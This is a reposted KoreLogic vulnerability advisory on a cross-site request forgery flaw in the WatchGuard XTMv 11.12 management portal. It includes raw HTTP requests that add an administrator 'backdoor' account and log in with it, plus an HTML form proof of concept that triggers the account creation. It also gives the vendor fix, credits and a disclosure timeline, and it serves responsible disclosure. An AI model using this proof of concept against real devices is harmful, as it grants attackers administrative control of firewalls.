WatchGuard XTMv 11.12 Build 516911 Cross Site Request Forgery
Posted on 12 March 2017
KL-001-2017-004 : WatchGuard XTMv User Management Cross-Site Request Forgery Title: WatchGuard XTMv User Management Cross-Site Request Forgery Advisory ID: KL-001-2017-004 Publication Date: 2017.03.10 Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2017-004.txt 1. Vulnerability Details Affected Vendor: WatchGuard Affected Product: XTMv Affected Version: v11.12 Build 516911 Platform: Embedded Linux CWE Classification: CWE-352: Cross-Site Request Forgery (CSRF) Impact: Privileged Access Attack vector: HTTP 2. Vulnerability Description Lack of CSRF protection in the Add User functionality of the XTMv management portal can be leveraged to create arbitrary administrator-level accounts. 3. Technical Description As observed below, no CSRF token is in use when adding a new user to the management portal. POST /put_data/ HTTP/1.1 Host: 1.3.3.7:8080 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Type: application/json X-Requested-With: XMLHttpRequest Content-Length: 365 Cookie: session_id=50f607247265897581a407bfb8b75e30d2b77287 DNT: 1 Connection: close {"__class__":"PageSystemManageAdminUsersObj","__module__":"modules.scripts.page.system.PageSystemManageAdminUsersObj","users":[],"add_entries":[{"__class__":"AdminUserObj","__module__":"modules.scripts.vo.AdminUserObj","name":"hacked","domain":"Firebox-DB","role":"Device Administrator","hash":"hacked","enabled":1,"rowindex":-1}],"upd_entries":[],"del_entries":[]} The HTTP response indicates that the changes were successful. HTTP/1.1 200 OK X-Frame-Options: SAMEORIGIN Content-Length: 68 Expires: Sun, 28 Jan 2007 00:00:00 GMT Vary: Accept-Encoding Server: CherryPy/3.6.0 Pragma: no-cache Cache-Control: no-cache, must-revalidate Date: Sat, 10 Dec 2016 18:08:22 GMT Content-Type: application/json Set-Cookie: session_id=50f607247265897581a407bfb8b75e30d2b77287; expires=Sat, 10 Dec 2016 19:08:22 GMT; httponly; Path=/; secure Connection: close {"status": true, "message": ["The changes were saved successfully"]} Now, the newly created backdoor account can be accessed. POST /agent/login HTTP/1.1 Host: 1.3.3.7:8080 Accept: application/xml, text/xml, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Type: text/xml X-Requested-With: XMLHttpRequest Content-Length: 414 Cookie: sessionid=515F007C5BD062C2122008544DB127F80000000C; session_id=0a3d24668f5c3b2c7ba7016d179f5f574e1aaf53 DNT: 1 Connection: close <methodCall><methodName>login</methodName><params><param><value><struct><member><name>password</name><value><string>hacked</string></value></member><member><name>user</name><value><string>hacked</string></value></member><member><name>domain</name><value><string>Firebox-DB</string></value></member><member><name>uitype</name><value><string>2</string></value></member></struct></value></param></params></methodCall> The response below shows the application issuing an authenticated session cookie. HTTP/1.1 200 OK X-Frame-Options: SAMEORIGIN Content-type: text/xml Set-Cookie: sessionid=74B0DC5119495CFF2AE8944A625558EC00000008;secure;HttpOnly Connection: close Date: Sat, 10 Dec 2016 19:55:26 GMT Server: none Content-Length: 751 <?xml version="1.0"?> <methodResponse> <params> <param> <value> <struct> <member><name>sid</name><value>74B0DC5119495CFF2AE8944A625558EC00000008</value></member> <member><name>response</name><value></value></member> <member> <name>readwrite</name> <value><struct> <member><name>privilege</name><value>2</value></member> <member><name>peer_sid</name><value>0</value></member> <member><name>peer_name</name><value>error</value></member> <member><name>peer_ip</name><value>0.0.0.0</value></member> </struct></value> </member> </struct> </value> </param> </params> </methodResponse> 4. Mitigation and Remediation Recommendation The vendor has remediated this vulnerability in WatchGuard XTMv v11.12.1. Release notes and upgrade instructions are available at: https://www.watchguard.com/support/release-notes/fireware/11/en-US/EN_ReleaseNotes_Fireware_11_12_1/index.html 5. Credit This vulnerability was discovered by Matt Bergin (@thatguylevel) of KoreLogic, Inc. and Joshua Hardin. 6. Disclosure Timeline 2017.01.13 - KoreLogic sends vulnerability report and PoC to WatchGuard. 2017.01.13 - WatchGuard acknowledges receipt of report. 2017.01.23 - WatchGuard informs KoreLogic that the vulnerability will be addressed in the forthcoming v11.12.1 firmware, scheduled for general availability on or around 2017.02.21. 2017.02.22 - WatchGuard releases v11.12.1. 2017.03.10 - KoreLogic public disclosure. 7. Proof of Concept <html> <body> <form action="https://1.3.3.7:8080/put_data/" method="POST" enctype="text/plain"> <input type="hidden" name="{"__class__":"PageSystemManageAdminUsersObj","__module__":"modules.scripts.page.system.PageSystemManageAdminUsersObj","users":[],"add_entries":[{"__class__":"AdminUserObj","__module__":"modules.scripts.vo.AdminUserObj","name":"hacked3","domain":"Firebox-DB","role":"Device Administrator","hash":"hacked3","enabled":1,"rowindex":-1}],"upd_entries":[],"del_entries":[]}" value="" /> <input type="submit" value="Trigger" /> </form> </body> </html> The contents of this advisory are copyright(c) 2017 KoreLogic, Inc. and are licensed under a Creative Commons Attribution Share-Alike 4.0 (United States) License: http://creativecommons.org/licenses/by-sa/4.0/ KoreLogic, Inc. is a founder-owned and operated company with a proven track record of providing security services to entities ranging from Fortune 500 to small and mid-sized companies. We are a highly skilled team of senior security consultants doing by-hand security assessments for the most important networks in the U.S. and around the world. We are also developers of various tools and resources aimed at helping the security community. https://www.korelogic.com/about-korelogic.html Our public vulnerability disclosure policy is available at: https://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.2.txt